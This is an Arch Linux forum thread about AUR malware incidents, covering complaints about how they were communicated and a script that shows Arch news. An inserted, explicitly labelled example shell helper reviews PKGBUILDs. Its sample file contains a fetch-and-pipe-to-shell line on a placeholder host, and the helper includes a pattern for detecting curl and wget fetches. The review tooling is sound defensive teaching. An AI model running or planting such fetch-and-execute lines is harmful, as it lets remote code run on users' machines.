Moving to debian, in my opinion this has not been communicated very well.
Just because of the AUR incident(s)? LoL
Last edited by 5hridhyan (Yesterday 18:14:45)
Yeah, kinda all my servers are now Debian and this communication and uncertainty made me move.
gofree wrote:Moving to debian, in my opinion this has not been communicated very well.
Just because of the AUR incident(s)? LoL
in my opinion this has not been communicated very well.
It would probably be more productive to quantify that communication deficit.
Fwiw, https://archlinux.org/news/
You can subscribe to that and I've also (previously posted) a script one could motd.
Sure, I've seen that. Probably like every other guy I tried to find some "next steps - what needs to be done". Where is the list, what to check, etc., preferably in a visible place, not hunting down Reddit, Phoronix and various forums for "semi-official" guides. That's something that could have been done better. Just my 2 cents.
Why is there so much outrage? The philosophy and scope of this project have been well known for a long time. Just because new people install Arch or use Arch derivatives doesn't change the goal of this project: the end responsibility is with the user. The AUR is not an official repo and should be examined when installing things. The Arch team can decide whether to take some measures for this incident, but I don't understand this finger wagging. Nobody owes you anything, and if you are unhappy you can change distros.
Last edited by Reboot9012 (Yesterday 20:24:58)
No outrage here. I just think the scope of the impact deserved a wee bit more.
So this is essentially garbage, but considering that the main issue is Steam Deck users, and calling out violation of Arch Linux philosophy doesn't deter complaint,
I cobbled together a non-tested additional AUR check topology design, in the AI slop phase, for a centralized server maintaining problem-child repos and client-side checking of git AUR packages and URLs within the PKGBUILD, as well as common issues.
Maybe as something for someone to fork and deliver on.
Sure, I've seen that. Probably like every other guy I tried to find some "next steps - what needs to be done". Where is the list, what to check, etc., preferably in a visible place, not hunting down Reddit, Phoronix and various forums for "semi-official" guides. That's something that could have been done better. Just my 2 cents.
But that's the point: AUR is **not** official software. And there is no possible definitive list of checks other than *either* do not use AUR package *or* read the `PKGBUILD`s and ensure you are happy executing them. That list of checks is the **only** one which can give you any guarantees. It has also been the standard list of checks for as long as I have used Arch.
CLI Paste | How To Ask Questions
Arch Linux | x86_64 | GPT | EFI boot | refind | stub loader | systemd | LVM2 on LUKS
Lenovo x270 | Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz | Intel Wireless 8265/8275 | US keyboard w/ Euro | 512G NVMe INTEL SSDPEKKF512G7L
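As an added illustration of what "read the PKGBUILD" comes down to in practice (this is example code written for this page, not a script from the thread or from any poster), the POSIX sh helper below pulls three things out of a PKGBUILD before you build it: every entry of the source=() array, how many checksums are set to SKIP, and any line that reaches the network outside of source=(), which makepkg neither downloads nor checksums. The PKGBUILD it runs on is constructed for the demonstration; the package name and the example.invalid host are placeholders.

```shell
#!/bin/sh
# Added example (not code from the thread or any of its posters): a small
# POSIX sh helper that prints the parts of a PKGBUILD worth reading first.
# The PKGBUILD below is constructed for the demonstration; "example.invalid"
# is a reserved, non-routable name, and example-tool is not a real package.

SAMPLE_PKGBUILD='pkgname=example-tool
pkgver=1.0
pkgrel=1
source=("https://example.invalid/example-tool-1.0.tar.gz"
        "git+https://example.invalid/helper.git")
sha256sums=("SKIP"
            "SKIP")
build() {
  cd "$srcdir/example-tool-1.0"
  make
}
package() {
  # a fetch at build time that is not declared in source=()
  curl -s http://example.invalid/post-install.sh | sh
  make DESTDIR="$pkgdir" install
}'

# list_sources PKGBUILD_TEXT: every entry of the source=() array, one per line.
# This is the complete list of what makepkg downloads and checksums.
list_sources() {
  printf '%s\n' "$1" |
    sed -n '/^source=(/,/)/p' |
    sed 's/^source=//' |
    tr -d '()"' |
    tr ' ' '\n' |
    grep -v '^$'
}

# count_skip PKGBUILD_TEXT: number of checksums set to SKIP. A SKIP entry
# means makepkg verifies nothing for that source, so its content is
# whatever the remote serves at build time.
count_skip() {
  printf '%s\n' "$1" | grep -o 'SKIP' | wc -l | tr -d ' '
}

# undeclared_fetches PKGBUILD_TEXT: non-comment lines that reach the network
# outside of source=(), with line numbers. These run inside build()/package()
# and bypass the source download and checksum steps entirely.
undeclared_fetches() {
  printf '%s\n' "$1" |
    grep -nE '(^|[^[:alnum:]_./-])(curl|wget|git clone|npm install|pip install)([^[:alnum:]_-]|$)' |
    grep -v '^[0-9]*:[[:space:]]*#'
}

# review_pkgbuild PKGBUILD_TEXT: print a short review summary to stdout.
review_pkgbuild() {
  printf '== sources (check each URL points where you expect) ==\n'
  list_sources "$1"
  printf '\n== checksums marked SKIP: %s ==\n' "$(count_skip "$1")"
  printf '\n== network access outside source=() ==\n'
  undeclared_fetches "$1" || printf '(none found)\n'
}

review_pkgbuild "$SAMPLE_PKGBUILD"
```

On a real system the foreign (AUR) packages are listed by `pacman -Qm`, and the helper would be run as `review_pkgbuild "$(cat PKGBUILD)"` on each package's PKGBUILD and any `.install` file that comes with it. It is a triage aid that surfaces the lines to look at first; the build() and package() bodies still have to be read in full, which is the point cfr makes above.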
Fwiw, https://archlinux.org/news/
You can subscribe to that and I've also (previously posted) a script one could motd.
Is the script in another thread? I thought I checked through this one, but sorry if I missed it.
I was suspicious because I have `npm` installed and no idea why, but I apparently installed it 4 years ago, which is plenty of time for me to forget.
[I always read PKGBUILDs or diffs but I cannot say I understand everything or would never miss anything.]
Probably in the little scripts one or some other time somebody missed some news.
#!/bin/sh
# fetch the Arch news RSS feed, keep this month's and last month's items, render the HTML as ANSI text
export LC_ALL=C
THIS_MONTH="$(date +'%b %Y')"
LAST_MONTH="$(date +'%b %Y' -d -1month)"
curl -sL 'https://archlinux.org/feeds/news/' | tr '\n' ' ' | \
xmlstarlet sel -T -t -m "//rss/channel/item[contains(string(pubDate), '$LAST_MONTH') or contains(string(pubDate), '$THIS_MONTH')]" \
-o $'\n\e[33m' -v pubDate -o $'\n\e[0;1m' -v title -o $'\e[0m' -v description -o $'\n\n────────────────\n' |\
sed $'s/<p>/\\n\\n/g; s/<h.>/\\n\\n\e[1;34m/g; s%</\(h.\|b\|em\|strong\|pre\|code\)>%\e[0m%g;
s/<li>/\\n· /g;
s/<\(code\|pre\)>/\e[1;32m/g;
s/<\(strong\|em\)>/\e[1m/g;
s/&gt;/>/g; s/&lt;/</g; s/<[^>]*>//g' | fold -sw 100
It just gets the RSS feed, filters out the recent months and then turns the HTML into ANSI escape sequences.
Fwiw, I think gofree meant to get some links to the relevant aur-general threads, maybe https://md.archlinux.org/s/SxbqukK6IA and something like https://ioctl.fail/preliminary-analysis-of-aur-malware/
Which is fair, though it would have been necessary to stress that the full extent of the compromise is still unknown and generally void returns from the above by no means prove that your system isn't ridden with malware if you've so far been yolo-ing the AUR.
I cannot say I understand everything or would never miss anything
Understanding that you don't understand most things is the entrance to the path of wisdom. I think I told that some greek dude like 2500 years ago…
The recent attacks have not been very sophisticated, the introduction of npm to those packages is completely nonsensical and would probably have stalled you, and the most recent stunt to obfuscate code basically yells "hey look at me, I'm doing something shady".